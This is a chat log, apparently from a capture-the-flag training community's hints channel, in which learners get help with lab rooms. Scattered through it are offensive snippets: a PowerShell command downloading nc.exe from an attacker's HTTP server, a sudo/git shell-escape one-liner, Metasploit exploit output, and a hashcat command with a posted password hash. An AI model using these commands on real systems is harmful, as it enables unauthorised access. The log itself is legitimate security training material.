I also need help with "Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler" I am able to do this successfully with php version of this payload but I am curious how I am supposed to do it with .exe version of the payloads
any help is appreciated thanks in advance!
I'm having trouble with Penetration Fundamentions. It's asking "What testing process" but answers like low-level, high-level, Grey/black/white doesn't seem to be resolving it
Look at the number of * in the answer box.
oh my... i was using a hyphen... you are right and I should read more carefully. Thanks Scrubz!
Hi I am trying to complete the THM ice room and it said that the firewall has been disabled but still nmap output says ports are in filtered state
can anyone tell me why this is happening
┌──(venky㉿venky)-[~/Desktop]
└─$ sudo nmap -sS -Pn -A -p8000 -oN m.txt 10.10.200.27
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-13 16:11 EDT
Nmap scan report for 10.10.200.27
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
8000/tcp filtered http-alt
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2, Linux 4.4, Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 0.09 ms 192.168.244.2
2 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds
hello, I had a question on the room metasploit meterpreter
search -f secrets.txt
Everytime I run that command it just seems to hang. Is this command supposed to be pretty slow?
I looked up a few guides and the command is correct and everything else is pretty smooth in this room. Didnt know how heavy this module was
and after 3 attempts it worked perfectly nevermind lol
Are you using the AttackBox or your own VM? I've only had slowdowns when I was using the AttackBox because I was too lazy to turn on my own VM lol
attackbox... which is slow as molasses and also has outdated everything
I thought we were supposed to get better VM's when we subscribe? I might be wrong there
I never bothered to check the RAM on them, but I think you may be right either way, for me it slowdowns when I'm running gobuster or other things like that, but that's given
yeah; I cant imagine how much it would really cost for us paying customers to get VM's that at the very least have 8 gb of ram but I guess If it frustrates me enough I could always spin up my own VM
For the hashing - crypto 101 room I am supposed to go and crack a hash using online methods. I tried using crackstation.com, but that did not work and I cannot find any other resources other than trying to use hashcat for the first time. Any help I can get would be appreciated.
Which Task are you on? Hashcat is relatively easy to use.
hashcat -m HASHMODE /hashfile.txt /wordlist.txt
You can find hash modes here:
https://hashcat.net/wiki/doku.php?id=example_hashes
ayoo
hey. Anyone available who can help me with the room set? I'm on the last step.
I already edited the exploit to run commands. I use chisel to forward the port. I tested the cmd oneliner with my user - but the exploit doesn't execute
this is what metasploit shows me:
[*] 127.0.0.1:2805 - Sending host info to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Executing Windows RCE CMD for windows/x64/exec
[*] 127.0.0.1:2805 - Sending malicious handshake to 127.0.0.1:2805
[*] Exploit completed, but no session was created.
it worked.
Gotcha, thank you. I will try that out and I am sure it will work. I think the room wanted me to use that specific website and it was not working so I had to find out another way.
https://tryhackme.com/room/networkservices# - Exploiting SMB. Last part. Can't find smb.txt at all. Can anyone provide hints?
Where are you looking for the smb.txt? On the SMB share or through SSH?
smb share, I'll try ssh
I've tried to login to the ssh using the rsa key but it's still asking me for a password which I'm having a hard time finding
Can you show me a screenshot or the command you used to connect to SSH?
You changed the permissions of the key right?
Apparently so. Originally I was using "John Cactus" instead of just "cactus@ip" and once I did that it gave me an incorrect format thing so I looked up a walkthrough
Hi, i was studying the room "linux privilege escalation" and in the last where the escalation is done with NFS, am not able to execute the C file, that i upload in it.
It giving the error
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
https://tryhackme.com/room/linprivesc
This is the room, and its the second last task
I tried to change the code with this above version, but still the error was there.
The initial c code was same the one mentioned in the lesson
It good now.
and you mean live off the land within nfs?
but escalation within system and using nfs is different right.
The task was to escalate through nfs to the server
ok i understand 🤔
holla, i could use a hint on takeover, i tried subdomain enum with fuzz but so far nothing, also tried some manual guesses. dirbuster is also not giving much interesting back? am i missing something?
You didn't find any subdomain while fuzzing ?
Nope
Tried lepus as well, which said it found 1 but it is unresolved
And doesnt seem to give any result
Can you show us your command for fuzz ?
hey, I'm doing Anonymous Room and I don't know why but I can't get a connection back from my reverse shell. I don't know if its because of that, but I deleted the clean.sh and then uploaded a new one with a bash reverse shell script. But I still have no connection
hello i have a big problem on the room "Hackpark"
we have to login in a login page
i know the username and the password
im sure about password and username
but it didnt work
So you've found the username and bruteforced the password for task 2?
But it won't let you login with the found uname and pw?
Are you sure your hydra command is correct? Could be that the message it's looking for is wrong so it's giving you correct password because it can't find the text you specified
Yes and im sure about password and username
Can i send you the id in private message ?
Sure
ok so im doing the Looking Glass CTF from the wonderland series and im kinda stuck at the nmap scan where im only getting loads of unnecessarily open ports with ssh (i know its intentional) ... so any hints regarding that one im just stuck
i tried different nmap scan like Xmas ... i even utilized --scanflags and scanned with some different combinations of packets sent
https://tryhackme.com/room/lookingglass thats the room
I'm doing the file inclusion room and I'd like a hint if possible. I'm closish to finishing this third challenge
do we have to use burpsuite for challenge 3? I'm trying to get this to work using inspect element and it's not playing nice
Yeah doing it in Burp is easier
I'm having issues getting burp to work, I've never used burp before
yeah burp can't find the box. I'm running burp via attackbox and it can't find the room vm
anybody can help w this
In Sakura room Task 5 question 3:
What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
even when i put correct link is showing wrong answer please if someone has a link which is accepted as answer tell me
Copy the link with the md5 hash from the png available in the hint.
What do you mean exactly? Is the extension foxyproxy activated?
yeah I didn't know you had to have foxyproxy active.
it's fixed, I finished it a few days ago
Regarding Task 4- Manual Discovery - Content discovery - i am not sure where to look at to find the secret area. Any hints?
Hey wondering if someone could help me with this:
#room-hints message
and this:
#room-hints message
Pay close attention to the loc tag
Legeeeend
i dont know how to make the Q4 of Walking An Application
Pay attention to the last paragraph in the section, it explains it well
i got it, thanks
Brain is fried. Content discovery Manual discovery Task 6 . The flag i find does not work. Anyone passed this stage?
You're on about this one then… there's hardly any flag on the source code…
hey have you solved this yet? The flag isn't in the source code
Nope. Genuinely trying to crack this to move on
Ping me when you re-try this
why this is not working ?
Maybe the type of quotes you have that are quoting ' 'Username already exists ' '
Try these quotes maybe " "
Yeah
thanks
Well.. no luck so far
Did you try the long url?
i am planning to change my username, but how to know if my username that iam willing to change to, is already available?
The /thm-framework-login one? Yes indeed
Did you read all the links?
getting a 404
Nobody has that username then.
oh ok, i misunderstood your statement. I though it was a whole link
ok gotcha, thank you
I retried all the source links and the main "static" hyperlink. I feel it's easier to find than i think
But i don't have a clue
what about documentation?
i can't do this, i need help
Might want to show a screenshot of the command you used, as from that screenshot there is not much to see
You have a typo in "urlencoded", best to use the copy paste clipboard to copy such long commands to the attackbox
aaa thanks
I'm doing the Pickle Rick room but when I try to ping the machine I'm not getting any response but it's showing I'm connected with openvpn. Is this normal?
can you access site in browser
Let me check. I normally only do them in the boxes provided but trying to do it on my own VM. I'll try that now.
Yes, it open in my vm machine that I am connected to with openvpn. I can see the help morty page.
then it works. might just be your internet is a bit slow or smth
I've done a ping scan and for example it just says 169 transmitted, 0 received.
If it try an nmap scan it says host seems down.
Will restarting the machine help?
can you ping -c 3 10.10.10.10
might do yes
I think I will have to restart it's strange that I can still see the page though but can't ping
try
I terminated the thm machine. I restarted my vmware kali and connected to the openvpn. I started the thm machine. I can view the picklerick web app in my machine but can't ping or nmap scan the ip address of the active machine. But it did let me ping scan the webapp when I use address rather than the IP address. Not sure if something is blocking stuff or a vmware issue or a issue on tryhackme side.
You can't ping all the machines.
I use vmware and encounter no issues.
Best bet would be to use this
!vpnscript
Been using the link that gives me a tag including the word "static"
Strange, works ok for me.
Can i private message you the tag i see?
No, if it's the same one you've sent that's fine.
Im not stuck, i know what I'm looking for, but the GPS thing is weirdly set up and Wigle isn't giving me results
This is from the OhSINT room
annoying asf
can someone give me another hint for https://tryhackme.com/room/uploadvulns task 8
the server side filter wont accept php and the hint on it is Commands do not start with a "-". Just use the word itself.
Check out their Wikipedia page
Bruh i was so sure they would have filtered out php5 too i didnt even try it
Thanks buddy. Took me 72 hours but glad i found it. Thanks for your help
Gave +1 Rep to @lucid junco
I am in the Corp room. I am stuck.
I have a jpg but do not know how to add it.
I am just typing the first steps.
System.Net.WebClient).Downloadfile('http://10.8.133.41.:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')" it says exception downloadfile with 2 arguments
never mind- I decided to type the command and see what happened. I got the text file with the flag. \Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
At the authentication bypass Task 2 , the instructions do not teach you how to create a file with a line of code..
More than likely this room was to be done after Linux fundamentals 1,2 and 3.
The task doesn't ask you for a line of code. Just a simple text file with the users you found
I get it. Thanks
Gave +1 Rep to @strong silo
Maybe I haven't understood your question correctly. You don't know how to create a file using the terminal or you thought that your file should contain some code inside?
Thank you, I'll remember that.
Gave +1 Rep to @lucid junco
Hi !
im actually doing the Wonderland box. i have access to the server via ssh, but now i'm stuck, so there is my question :
Do i need to know the Alice's world to pwd this box ?
or can it help to know the story ?can it be useful to know the story?
Where are you stuck?
has anyone got the ivpn.exe service to recompile and start on Osiris -appear to be stuck with getting the service to start
Does anyone have a hint for Linux Forensics Task5, i seem to be blind. i can't find the histsize in the .bashrc file
nvm was looking in the wrong file
It's nuts how much hand holding i need.. Task 4 Authentication bypass. I created my username , my account but no support ticket leading me to Robert. I tried to include my username in the code in different locations (to no avail..)
Is there a junior Linux course included cause i just seem not to understand much?
Morning mate, it asks you to create a file. You mentioned that's a file for my own records. Yet, i am including the names in the code but the query is aborted when i do this. 💯
Hi, thank for answer.
I'm actually stuck with Alice account. I didn't find the exploitation vector to pivoting through another user
Gave +1 Rep to @lucid junco
So you've logged in as Alice?
Ok, first thing I do when I login as a new user, is check what they can run.
sudo -l right ?
hmm.. Thank you for the hint. I've already check this command, but i will continue to investigate it !
Hi, May I know that have you got the solution for this?
hi there, regarding outlookleak room
why the listeners doesn't work on my kali, and only work on attack machine
after uploading my own clean.sh file with the script, I just had to wait a bit for the job to execute the file and get the reverse shell connection back to my netcat listener
share a screenshot of the file you created and the command you tried to run to find possibles usernames
Yeah, it worked. The file should be replaced, instead i removed and uploaded the file. I believe replacing the file doesn't change the file permissions. Removing and uploading the file changes the permissions
Hi there..I need hint about how to proceed for Task1 in "WYWM Hackathon Aug 2021" room
I tried the network scan and tried the exploits also but not successful
currently stuck about how to proceed next
I see people adding graphics. How do you do this. I cannot figure that out?
in intro to c2 task 4 not sure my armitage ui isnt loading up for me ive done all the steps right
What do you mean by graphics?
screen shots
you need to verify to be able to send screenshots
!docs verify
hello,in room named "agent sudo", i knew it needs to change the UA,but how do I know if I need to change UA to a specific character?
is anybody there
Have you tried changing the UA to the one who posted or sent the message?
In the NetSec Challenge room, in the last question or challenge, can someone give a nudge on the type of scan to use? I've tried several combinations, but can't get it to work. There was one I have yet to try, but having issues finding a zombie host.
Is this the challenge to do a quiet nmap scan?
Yes, it is.
any hint for Devie room?
That room is best of using the attackbox.
Pyramid of pain Task 2 has a new hash. I Inputted the file name and does not like it. I have tried every way possible and I have even tried to look up the answer on Google. Can someone help?
what name you did put ?
!docs verify
will help to show screenshots and will be easy to help
I also tried Trojan/Suspectcrc!PxYUFiQu
one sec. the task 2 and question is
Analyse the report associated with the hash ...
Yes
you did put that hash in search of virustotal
Yes
try look at Details tab
Purchase_Order 6862.xls?
try it...
Thank you!
np
!docs verify
to get connected
Thank you. I just connected
also #start-here is helpful
I will check it out.
Please give a hint for Devie. I need help how can i send input to trigger eval() function.
any hint for Wonderland room?
Hi, I could use an hint for privilege escalation for the room LinuxAgency
When using the command of GTFOBIN: sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
It's fixed is it because I didn't upgrade my shell anyone has idea if that could be the problem?
Which part are you stuck at?
@umbral umbra this message got sent in nearly all channels..... makes shadow not wanna answer the question
ah...
have you used burp suite in the past???
because that is probably easier then curl in this instance
im not good at it, only used proxy
yes i tried to ask chatGPT how to do it using burp
but it didn't work out, i lack experience
well first try and do a get request then capture that in burp... right click... click send to repeater... rightclick again.... select change method to post
and you should be able to handle it from there hopefully
or you can go through the burp rooms on tryhackme to learn this
i will try first then if it didn't work i will learn burp, thank u
Gave +1 Rep to @alpine kestrel
it worked, thanks again
Gave +1 Rep to @alpine kestrel
oh glad it worked.. good job on hacking the thingy code
help
challenge 3 in file inclusion is filtering numbers and slashes
idk how to bypass that filter
@jaunty elm
Hey hey, I've just finished the Inferno room, and I wonder how you made the auto-killer for TTY shells. Would you mind DMing me how? thanks :>
Gave +1 Rep to @jaunty elm
Hi, I'm working on the SQL injecion module (on Jr pentester path)
I don't understand how to do it..
(forget about it lol )
ima so dumb
Hello everyone. Im stuck on the nmap learning path
the question im stuck on is "How would you tell nmap to scan all ports?"
Kinda dumb I know but I cant seem to get it. Any hints would be greatly appreciated.
nvm I got it
somebody know how to make this challenge 3 ?
I am know, i saw somebody make by curl, but i want to make by http
i'm catching up
I've done this room but forgot and don't have a write-up for it
as I'm completing the room though, I can give you another hint:
||Hint: try different GET, POST, DELETE methods of request ||
||Perhaps the POST method?||
Hi guys
need help with Room Snort
when I try to enter in terminal sudo ./traffic-generator.sh the response is "command not found"
any hints?
Are you in the directory where ./traffic-generator.sh is in ?
Otherwise if you are not, you will need to declare the entire path
Gave +1 Rep to @slender kelp
Can someone please explain this https://tryhackme.com/room/linprivesc
I dont understand what it means when it says this privilege escalation vector is therefore not discoverable when enumerating files looking for SUID.
Does this mean that when looking for SUID vulnerabilities you wont be able to find capabilities vulnerabilities at the same time for just vim and its copy?
I am not sure why it is included in the capabilities section of the room
Sysinternals - Task 5 - TCPView
I think i found the answer but it doesn't fit the field. Please help me
||Microsoft Corporation||
You sure?
Thats apparently the right answer
!docs verify
verify, send a spoilered screenshot
I found this answer. but the expected number of characters is different and it doesn't accept my answer
||https://www.talosintelligence.com/reputation_center/lookup?search=52.154.170.73#whois||
@trim haven
any ideas?
From what I understand, it says that it won't be discoverable due to the fact that when enumerating files with the SUID bit set, we run the command (or its variation): find / -user root -perm -4000 -exec ls -ldb {} \; However, in the given vim example, the permissions were lrwxrwxrwx and -rwxr-xr-x. Thus, these will not be included in the result or command output.
well you can use -perm /4000 which will give you different results to a degree
what will be the answer in the fakebank quiz
I have answered $767.68 as fakebank.com shows. but it says wrong
That is the wrong answer. It's not asking for the balance.
then what
When you've transferred money to your account, go back to your bank account page. What is the answer shown on your bank balance page?
it shows 767.68
Can you kindly help me out
What is the answer shown on your bank balance page?
I got it thanks
thanks
Help
I don't get the question
Is it supposed to be where?
Yup
Can some Admin change it please since it's confusing ??
Is supposed to be where instead of how
read the part Example Scenario: there is answer
I already solved it, just the question was supposed to be When instead of How
No, it's supposed to be where
Which can also be "How"
How = where?
i don't get it
it's not necessarily to be updated but it makes more sense when it's "where"
Where did you learn to play the piano?
How did you learn to play the piano?
Two sentences swapping out how and where, with the context.
excuse my poor english
I Learnt English at school
I learnt English by talking to people
Same Concept here, just two different questions already
Can I have a hint for the OWASP top 10 room, task 19. I'm looking at page source and not seeing anything.
google about the title of web page
oh
hello guys
im stuck at a question
i need your help
can anyone here help me
At the nmap tutorial, on task 4, Discovering Live Hosts, I put the correct answer for the first question, but it says that it is not correct. Does anyone know why???
What is the question?
What is the type of packet that computer1 sent before the ping?
and i put ARP Packet
can you link the room?
Oh yeah, the type of packet, are you familiar with how ping works?
yes
What happens?
you send packets to see if the host is up or not
And what does the host do if it's up?
Even if you look just above the question.
you should work out half your answer is correct, one half isn't.
Hey guys what programming language is better to start
Not a particular room I need help with but feel it fits here. When I run an Nmap scan on a room machine, I understand I am scanning that machine of that room. Lets say its a 10.xx.xx.x address. If I switch off that machine and scan the same IP then presumably it's a different person's computer? Am I missing something?
Well it might be the room machine of someone else then, yes, depends if they got assigned that IP for their room machine. But I'm a bit unsure what exactly you're asking?
The interesting question of how well firewalled off from each other thm users are
Someone whispered ||Python||, Go (in the order)
Why not C++?
So I looked up the answer for this page, but I dont really know where to get the answers for question 3 and 4 of task 5... Can anyone explain it to me? For me the page didn't really specify what the Carbanak layer was that well
https://tryhackme.com/room/redteamthreatintel
Ive opened up the APT 39 Att&ck navigator but idk what I'm looking for
I was looking for someone to point me in the right direction, so I know how they got the answers
I figured it out after watching a video... I didnt realize you had to look for Carbanak on the Mitre website
Yes, I think you answered it. Thanks
Gave +1 Rep to @left thunder
Hi all been fiddling for ages trying to get attackbox working properly now i've hit another wall... can anyone help?
Working on Linux Fundamentals 3 task 4, have launched python3 -m http.server, now when I go to wget the .flag.txt I'm just getting nothing....
Hahaha nevermind, a little research goes a long way. it never occurred to me to open a second terminal..
Hello! I think I could use some help with room sqlinjectionv2 task #8. (I think) I was able to find the two table names, but from there I am a little bit lost. Thanks!
ok that's just mean to put analytics_referrer lol
ok problem solved thanks
Thanks so much. BTW, Do we do this every time? Or was it a one time thing?
Gave +1 Rep to @forest drift
It's a one time thing
Thanks again!!!
I dont understand why this answer is not being accepted?
smbclient //10.10.43.92/secret -U suit -p 445
i tried port 139 too
Your syntax is wrong.
nevermind I was using the wrong ip address
oh where?
Can you link me the room please.
I got it, I was using the box's ip address but the question asked what would be a command for this other one. Thanks a lot though
Gave +1 Rep to @lucid junco
I'm trying to do the Blue room but do we have to use our own vm or can we use the THM attackbox/kali. I tried but when I got to the point of needing to set the LHOST in metasploit I didn't know what to do, I looked up a walkthrough but they used their vpn and were on their personal vm. What do you set LHOST if you are using the thm attackbox/kali? I'm also trying on my own machine but nmap is saying it has 3 and a half hours remaining.
Hey, have you looked up/understood what LHOST is? You can use the Attack box or your own VM with OpenVPN, since both options will be connected to the same network as the vulnerable machine
I'll need to brush up on it again. I tried to put my openvpn ip for lhost but it didn't work. I'll look it up.
So then what would you put as the IP if you were using the Attackbox?
What's the difference between RHOST and LHOST?
RHOST is the target machine IP and LHOST is my machine that I'm using msfconsole on as I understand it.
Yes, so if you're using the Attackbox as your machine, which IP would you use for LHOST?
The attackbox IP for LHOST
When you have a chance to try the room again, let me know if you manage to get it to work
Ok thank you will.
Gave +1 Rep to @unborn moon
@lucid junco @nocturne garden Moving on to thank the support i had, thank you very much, i was able to conclude the room. Thank you very much.
Gave +1 Rep to @lucid junco
+rep @nocturne garden
Gave +1 Rep to @nocturne garden
You're welcome.
Thank you, I managed to complete it and feel more comfortable with the LHOST and RHOST!
Gave +1 Rep to @unborn moon
No worries!
Awesome, thanks for letting me know. Happy hacking
Gave +1 Rep to @loud merlin
!dark
y
so i found many files
i found two key words
idk if those are Username / pass
they didnt work with the ssh
BORG_IDXd
BORG_SEG@
those
Are they any important?
did you find passwd file and squid.conf
i didn't get inside the machine yet
did you enumerate with gobuster and find two directories
yes
oh mb i didnt go to the other one
ok i found them
i don't understand the text in front of the music archive
is this a user?
must be
if you can post pic will help.
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
oh that..
that is correct yes.
so. what do you think how do we crack offline hash ? there is 2 most used app/command
how do i crack it then, i seen a video about passwd password and that they are randomly generated hashes
john?
yes
K will try it
ill let you know. you do not need to specify the format. just simple john with wordlist file and that file
the password doesnt work 
you did get password that starts with s
yes
just dont post spoil
sorry
who says it's password for ssh or smth like that ?
might be for something else ?
you have archive.tar file ?
Yes
it has nothing
worth
like just random text i mentioned before
hmm... one of file in that archive.tar can give you hint for solution. try check most OBVIOUS file
hints i don't understand what's inside
what is most first file that you will READ if you need help
hints?
xD
README
try
oh ok
it says is backup repo. the app name is hint what you need to apt-get install to move on
one hint. the archive file is more than just simple archive.tar
help
it says the archive is not a valid repo
check repo config
did you install backup app ?
borg?
y
yes i am using it